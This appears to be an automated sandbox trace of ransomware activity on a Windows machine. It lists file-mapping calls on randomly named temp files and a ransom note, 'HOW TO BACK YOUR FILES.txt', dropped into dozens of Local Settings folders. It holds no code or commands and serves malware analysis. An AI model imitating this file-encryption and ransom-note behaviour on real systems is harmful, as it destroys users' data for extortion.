Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\jA0vE43xnVQwXozy.flv filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\jA0vE43xnVQwXozy.flv, protection = PAGE_READWRITE, maximum_size = 10768 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\Kk_im1au5TCOJfL.odt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\Kk_im1au5TCOJfL.odt, protection = PAGE_READWRITE, maximum_size = 33216 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\LAFLIJsVjKK-O.swf filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\LAFLIJsVjKK-O.swf, protection = PAGE_READWRITE, maximum_size = 29456 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\lVAbllj.bmp filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\lVAbllj.bmp, protection = PAGE_READWRITE, maximum_size = 20912 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\MVqkf6GOhxTXr.gif filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\MVqkf6GOhxTXr.gif, protection = PAGE_READWRITE, maximum_size = 65296 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\OK_-vR.mkv filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\OK_-vR.mkv, protection = PAGE_READWRITE, maximum_size = 100800 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\PpqV.avi filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\PpqV.avi, protection = PAGE_READWRITE, maximum_size = 36720 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\pU76_oHg8.docx filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\pU76_oHg8.docx, protection = PAGE_READWRITE, maximum_size = 65472 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\qsiIC5quFGp.flv filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\qsiIC5quFGp.flv, protection = PAGE_READWRITE, maximum_size = 14432 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\rv4A_L21ZRdO.mkv filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\rv4A_L21ZRdO.mkv, protection = PAGE_READWRITE, maximum_size = 20352 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\TIP8JVRUCFz6SzbPuG.swf filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\TIP8JVRUCFz6SzbPuG.swf, protection = PAGE_READWRITE, maximum_size = 67232 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\TMyzIkMwWICmieV.csv filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\TMyzIkMwWICmieV.csv, protection = PAGE_READWRITE, maximum_size = 84720 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\UH3p_ZuzzXV1NtEd6s.wav filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\UH3p_ZuzzXV1NtEd6s.wav, protection = PAGE_READWRITE, maximum_size = 15824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\UQ6xqw365P.mkv filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\UQ6xqw365P.mkv, protection = PAGE_READWRITE, maximum_size = 20784 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\XvrOiP2wT.doc filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\XvrOiP2wT.doc, protection = PAGE_READWRITE, maximum_size = 32304 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\Y4HO9nidsAl5O.ppt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\Y4HO9nidsAl5O.ppt, protection = PAGE_READWRITE, maximum_size = 65984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Publishers\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Publishers\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\SettingsContainer\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\SettingsContainer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Licenses\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Licenses\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Fonts\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Publishers\8wekyb3d8bbwe\Fonts\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\PeerDistRepub\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\PeerDistRepub\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\Temp\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\Temp\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetHistory\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetHistory\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetCookies\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetCookies\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetCache\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows_ie_ac_001\AC\INetCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG1 filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG1, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\AppData\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\AppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG1 filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG1, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalCache\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\AppData\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\AppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\AC\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\AC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1 filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1632 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
